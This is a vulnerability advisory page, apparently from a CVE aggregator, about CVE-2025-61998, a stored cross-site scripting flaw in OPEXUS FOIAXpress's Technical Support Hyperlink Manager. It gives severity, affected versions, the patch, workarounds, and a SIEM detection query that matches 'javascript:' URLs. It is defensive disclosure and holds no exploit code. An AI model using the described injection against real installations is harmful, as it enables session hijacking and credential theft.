CVE-2025-61998 – This vulnerability allows administrative users ... (How to Fix)

Q: What is the severity of CVE-2025-61998?

CVE-2025-61998 has a CVSS score of 4.3 (MEDIUM). This vulnerability allows administrative users in OPEXUS FOIAXpress to inject malicious JavaScript or content into the Technical Support Hyperlink Manager. When other users click these links, the injected content executes in their context, potentially enabling session hijacking, credential theft, or unauthorized actions. Only FOIAXpress installations before version 11.13.3.0 are affected.

📋 TL;DR

This vulnerability allows administrative users in OPEXUS FOIAXpress to inject malicious JavaScript or content into the Technical Support Hyperlink Manager. When other users click these links, the injected content executes in their context, potentially enabling session hijacking, credential theft, or unauthorized actions. Only FOIAXpress installations before version 11.13.3.0 are affected.

💻 Affected Systems

Products:

OPEXUS FOIAXpress

Versions: All versions before 11.13.3.0

Operating Systems: Windows Server (typical deployment)

Default Config Vulnerable: ⚠️ Yes

Notes: Requires administrative access to the Technical Support Hyperlink Manager feature. All default configurations with vulnerable versions are affected.

📦 What is this software?

Foiaxpress by Opexustech

View all CVEs affecting Foiaxpress →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrative user compromises other user accounts, steals sensitive data, performs unauthorized actions on behalf of victims, and potentially gains persistent access to the system.

🟠

Likely Case

Malicious or compromised admin injects JavaScript to steal session cookies or credentials from other users, leading to unauthorized access and potential data exfiltration.

🟢

If Mitigated

With proper access controls and monitoring, impact is limited to isolated incidents that can be quickly detected and contained.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires administrative privileges to inject malicious content. The attack then relies on other users clicking the malicious links.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.13.3.0

Vendor Advisory: https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf

Restart Required: No

Instructions:

1. Download FOIAXpress version 11.13.3.0 or later from OPEXUS. 2. Follow standard upgrade procedures per OPEXUS documentation. 3. Verify the upgrade completed successfully.

🔧 Temporary Workarounds

Restrict Administrative Access

all

Limit administrative privileges to only trusted personnel who require access to the Technical Support Hyperlink Manager.

User Education

all

Train users to be cautious when clicking links, especially those that appear suspicious or unexpected.

🧯 If You Can't Patch

Implement strict monitoring of administrative actions in the Technical Support Hyperlink Manager.
Apply principle of least privilege and review all administrative user accounts for necessity.

🔍 How to Verify

Check if Vulnerable:

Check FOIAXpress version in application settings or administrative console. If version is below 11.13.3.0, the system is vulnerable.

Check Version:

Check within FOIAXpress administrative interface under Help > About or similar version information section.

Verify Fix Applied:

Confirm the installed version is 11.13.3.0 or higher via the application's version information.

📡 Detection & Monitoring

Log Indicators:

Unusual administrative activity in Technical Support Hyperlink Manager
Multiple users accessing suspicious URLs from the same hyperlink

Network Indicators:

Outbound connections to unexpected domains following hyperlink clicks
Unusual data exfiltration patterns

SIEM Query:

source="foiaxpress" AND (event_type="hyperlink_modification" OR url_contains="javascript:")

📊 Metadata

CVE ID: CVE-2025-61998

CVSS v3 Score: 4.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

CWE: CWE-79

EPSS Score: 0.06% exploit probability (18.3th percentile)

Published: October 8, 2025

Last Updated: October 22, 2025

🔗 References

https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf Release Notes
https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json Third Party Advisory
https://www.cve.org/CVERecord?id=CVE-2025-61998 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-61998, you might also want to check these: